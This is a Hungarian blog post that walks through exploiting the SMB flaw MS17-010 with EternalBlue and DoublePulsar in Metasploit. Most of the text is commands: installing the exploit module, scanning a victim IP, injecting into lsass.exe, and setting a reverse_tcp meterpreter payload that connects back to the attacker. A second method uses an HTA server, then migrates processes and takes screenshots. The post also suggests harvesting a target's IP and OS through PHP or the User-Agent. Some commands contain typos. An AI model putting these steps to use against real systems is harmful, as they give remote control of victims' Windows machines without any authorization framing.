Az SMB protokollon keresztül küldünk egy Shellkódot az áldozat gépének és mivel rosszul kezeli a beérkező kéréseket parancsokat le is fogja futtatni a Shellkódot, majd aztán jön a képbe a DobulePulsar ami a rendszermagot azaz a Kernelt támadja meg akár egy processen keresztül vagy más módszerrel, majd a memóriába helyezi el a Shellkódot, és ott fogja lefuttatni, majd ezt után teljes hozzáférést biztosít a rendszerhez, mivel a DoublePulsar lehetővé teszi nekünk, hogy bármiféle nyers shellkódot lefuttassunk, mintha buffer overflow-al próbálnánk bejutni a célgépbe, célzottan az alkalmazást támadjuk meg, majd aztán a memóriába végzünk egy kis mocskosságot az alkalmazáson keresztül.
Nos, a kiszivárogtatás után készült egy két exploit, hozzáteszem azt is, hogy a Metasploit Framework-hoz is, csak viszont a fejlesztők nem tették bele azt az exploitot ami képes kombinálni, vagy ha úgy tetszik kihasználni mind a két hibát, az exploit nyugodtan letölthető a GitHub-ról, ha letöltöttük mondjuk ZIP-be vagy ahogy jól esik, ki kell csomagolnunk és ez után, pedig a(z) .rb formátumú fájlt be kell tennünk az exploitok közzé, ugyanúgy a Kali Linuxot használom, Kali alatt a következő helyre kell tenni a(z) .rb fájlt: /usr/share/metasploit-framework/modules/exploits/windows/smb/
Átlagos Linux alatt általában a(z) /opt mappában találjuk a metasploitot, csak akkor az elérési útvonal ahová tenni kell, értelemszerűen nem /usr/share hanem /opt lesz a többi ugyanaz majdnem, miután elhelyeztük akkor indulhat is a tesztelés, először is meg kell nézni, hogy az adott gép sebezhető-e, ehhez is van egy modul a metasploiton belül amivel csekkolhatjuk, egyébként a támadás során a következő infókat tudni kell: Windows típus (XP, 7, Server ..stb ), hány bites a rendszer, áldozat ip címe.
Mindezeket egyszerűen megszerezhetjük, mondjuk PHP kóddal le tudjuk kérni a címet, a rendszert és, hogy hány bites általában az User-Agentből is kiderül, vagy millió mód van még rá, vagy ha nem akkor majd totózunk és úgy is deríthetjük ki. :)
Kezdjünk is bele, nyissunk egy parancssort majd írjuk be, hogy: msfconsole
Ezzel a paranccsal hívjuk elő a metasploit konzolt, és innen fogunk dolgozni a továbbiakban miután elindult, akkor adjuk ki neki, hogy: search eternalblue
Először is az elsőt fogjuk használni, mivel azzal fogjuk analizálni, hogy sebezhető-e a célgép, adjuk ki a következőt: use auxiliary/scanner/smb/smb_ms17_010
Ezzel a paranccsal megmondjuk a metasploitnak, hogy mi ezt a scanner modult szeretnénk használni, majd ez utána adjuk ki a következőt: show options
Itt láthatjuk, mit tudunk beállítani, itt ami lényeges most nekünk az az RHOSTS opció, na meg egyes esetekben az RPORT opció, de általában alapból a 445-ös porton fut az SMB protokoll az rhosts opciónak többet is megadhatunk ha scannelni akarunk, én most csak egyet fogok, adjuk ki a következőt: set rhosts áldozatip (pl: 192.168.1.0), majd ez után adjuk ki a run parancsot.
Nos, azt mondja a metasploit modul, hogy a célgép az úgy néz ki, mint egy sebezhető gép, most fogjuk elvégezni a konkrét támadást, adjuk ki a back parancsot, majd ez után kilép a modulból, aztán adjuk ki a következőt: use exploit/windows/smb/eternalblue_doublepulsar
Ugyanígy, megmondtuk, hogy ez kell használni nekünk, itt jóval több beállítandó opciót látunk.
Tájékoztatóként megjegyezte a fejlesztő, hogy milyen adott processbe kell nekünk majd injektálni a kódunkat, hogy lefuthasson, 32 bites rendszer esetén a(z) wlms.exe fájlba kell injektálni, ez a process felet azért, hogy figyelemmel kísérje a Windows szoftverlicencének állapotát, 64 bites rendszer esetén pedig az lsass.exe folyamatba kell injektálni amin keresztül le fog futni a kártékony kód az lsass.exe fele a biztonsági házirendek érvényesítéséért, valamint annak betartásáért, jelszó módosításokra figyel és access token-t generál ha úgy adódik.
Nos, nekem 64 bites rendszer van, ezért kettő dolgot alapból át kell állítanom, ha neked is 64 bites akkor add ki a következő parancsokat: set processinject lsass.exe
Majd ezt: set targetarchitecture x64
Ha nincs akkor ezeket nem kell elvégezned, valamint Windows 7. rendszer, ezért a target-et úgy hagyom, ha mégis más rendszert akarsz megcélozni, akkor add ki a show targets parancsot, majd ott kiadja melyik rendszernek melyik az id-je és add ki a következőt: set target szám (pl: 1)
Az exploitnak van egy mappája amiből a szükséges libeket veszi ki, ez alatt a támadásokhoz szükséges fájlokat értem, ez általában stimmelni szokott, nekem az elérési út a /root/Eternalblue-Doublepulsar-Metasploit/deps/ ha neked eltér az elérési út amit a DOBULEPULSARPATH és az ETERNALBLUEPATH opció paramétereiben látsz akkor beállíthatod így: set DOBULEPULSARPATH /elérési útvonal/
Az eternalblue-t így: set ETERNALBLUEPATH /elérési útvonal/
Ennek az exploitnak szüksége van a wine nevű programra, ami egy Windows emulátor, mivel windows-on futó fájlokat fog létrehozni amit majd később felcsempész a gépre, ha még nincs telepítve teljesen ezt kell tenned:
dpkg --add-architecture i386 && apt-get update && apt-get install wine winetricks wine32
Ha minden készen áll már csak pár lépés van, be kell állítani a támadandó host-ot így: set rhost ip cím (pl: 192.168.1.1)
Ez után kell egy payload, azaz a kód amit fog injektálni, vegyük úgy, hogy az exploit a rakéta de viszont a rakétával célba is kell juttatni valamit, ebben az esetben a payload a rakétának a feje az egész robbanó töltet ha úgy tetszik, ebben az esetben a klasszikus meterpreter lesz az, adjuk ki a következő parancsot: set payload windows/x64/meterpreter/reverse_tcp
32 bites rendszer esetén: set payload windows/meterpreter/reverse_tcp
majd állítsuk be azt a hostot amire a célgépnek vissza kell nyitnia és amivel úgymond beszélgetni fog, mert beszélgetni kell. :)
parancs: set lhost a te ip címed (pl: 192.168.1.110)
Ez után a végső lépés kiadni a run parancsot.
Másik módszer
ifconfig
msfconsole
msf5 > use expolit/windows/misc/hta_server
msf5 exploit(windows/misc/hta_server) > set lhost 192.163.1.23
set srvhost 192.163.1.23
set payload windows/meterpreter/reserve_tcp
set lport 8111
exploit
server started
sessions
sessions -i 1
meterpreter > sysinfo
--------------
nmap 192.168.0.186 -Pn -sV
135/tcp msrpc
sudo msfconsole
msf6> searc smb
use auxiliary/scanner/smb/smb/smb_ms17_010
set RHOSTS 192.168.0.186
run
grep exploit
set rhosts 192.168.0.186
exploit
sysinfo
meterpreter> ps
migrate 4020
screenshot
----------------
https://www.hackingtutorials.org/metasploit-tutorials/metasploit-commands/
https://www.offensive-security.com/metasploit-unleashed/meterpreter-basics/
https://www.youtube.com/watch?v=Iy2pXcNfYkg
Nincsenek megjegyzések:
Megjegyzés küldése